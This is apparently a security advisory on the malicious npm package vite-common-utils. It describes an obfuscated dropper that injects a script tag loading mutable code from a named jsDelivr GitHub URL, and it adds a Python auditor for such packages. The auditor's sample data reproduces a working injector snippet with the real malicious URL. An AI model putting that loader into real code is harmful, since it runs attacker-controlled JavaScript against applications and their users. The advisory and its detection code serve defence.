
MAL-2026-6088

Malicious code in vite-common-utils (npm)

Details


## Source: amazon-inspector (b1d3397d754ffeb3726496769b2f159ce8596b2233b5875afa8f7fbca29ed0fd)

The package presents itself as a Vite utility library, but its only export, `loadFilbetScriptSilently`, creates a `<script>` element whose `src` is hardcoded to https://cdn.jsdelivr.net/gh/gongben2024/network-security@main/src/filbet.js and appends it to `document.documentElement`, causing the consuming application to fetch and execute whatever JavaScript that URL currently serves. The URL is unpinned (mutable `@main` branch), is hosted under a personal GitHub user account unrelated to the package publisher, and has no integrity (SRI) check. The shipped `dist/index.js` is the only file in the package and is heavily mangled with obfuscator.io (string-array decoder, hex identifiers, rotation loop), and `package.json`'s `devDependencies` include `gulp-javascript-obfuscator`, which confirms the obfuscation is intentional and hides the injector. The export name suffixed 'Silently', the cover-story package name, the obfuscation, and the off-publisher mutable code source jointly indicate a remote-code-execution dropper aimed at the downstream web application's origin and its users.
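As an added example (not code from the advisory or from the Amazon Inspector source), the Python below audits an unpacked npm package for the combination of traits described above: an unpinned jsDelivr GitHub URL, runtime `<script>` injection, obfuscator.io-style identifiers, and an obfuscator listed in `devDependencies`. The sample package contents are constructed to mirror the description rather than copied from the real package; the regexes and thresholds are this example's own choices, and the pin check treats any jsDelivr ref that is not a commit hash as mutable, which is broader than the `@main` case the advisory reports.

```python
import json
import re

# Constructed sample of an unpacked package (path -> text), modelled on the advisory.
# Not the real tarball contents; the devDependency version is a placeholder.
SAMPLE_PACKAGE = {
    "package.json": json.dumps({
        "name": "vite-common-utils",
        "main": "dist/index.js",
        "devDependencies": {"gulp-javascript-obfuscator": "*"},
    }),
    "dist/index.js": (
        "var _0x4a2f=['createElement','script','documentElement','appendChild'];"
        "function loadFilbetScriptSilently(){var s=document[_0x4a2f[0]]('script');"
        "s.src='https://cdn.jsdelivr.net/gh/gongben2024/network-security@main/src/filbet.js';"
        "document.documentElement.appendChild(s);}"
    ),
}

# Indicator patterns chosen for this example.
JSDELIVR_GH = re.compile(r"https://cdn\.jsdelivr\.net/gh/([\w.-]+)/([\w.-]+)@([\w.-]+)/[^\s'\"]+")
HEX_IDENT = re.compile(r"\b_0x[0-9a-f]{4,}\b")  # obfuscator.io-style identifiers
SCRIPT_LITERAL = re.compile(r"""['"]script['"]""")

def is_pinned_ref(ref: str) -> bool:
    """A jsDelivr GitHub ref is immutable only when it is a commit hash, not a branch or tag."""
    return re.fullmatch(r"[0-9a-f]{7,40}", ref) is not None

def find_remote_script_sources(js: str) -> list[dict]:
    """Return every jsDelivr GitHub URL in the code with its owner, repo, ref and pin status."""
    return [{"owner": o, "repo": r, "ref": ref, "pinned": is_pinned_ref(ref)}
            for o, r, ref in JSDELIVR_GH.findall(js)]

def audit_package(files: dict[str, str]) -> list[str]:
    """Flag the traits described in the advisory; returns human-readable findings."""
    findings = []
    pkg = json.loads(files.get("package.json", "{}"))
    for dep in pkg.get("devDependencies", {}):
        if "obfuscat" in dep.lower():
            findings.append(f"devDependency suggests deliberate obfuscation: {dep}")
    for path, content in files.items():
        if not path.endswith(".js"):
            continue
        for src in find_remote_script_sources(content):
            if not src["pinned"]:
                findings.append(f"{path}: unpinned remote code from gh/{src['owner']}/{src['repo']}@{src['ref']}")
        if SCRIPT_LITERAL.search(content) and "appendChild" in content:
            findings.append(f"{path}: injects a <script> element at runtime")
        if len(HEX_IDENT.findall(content)) >= 2:
            findings.append(f"{path}: obfuscator.io-style hex identifiers")
    return findings
```

Running `audit_package(SAMPLE_PACKAGE)` reports all four traits, while a plain library with no remote loader and no obfuscation yields an empty list.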


Affected packages

npm / vite-common-utils

No fixed version published yet for vite-common-utils (npm). Pin to a known-safe version or switch to an alternative.
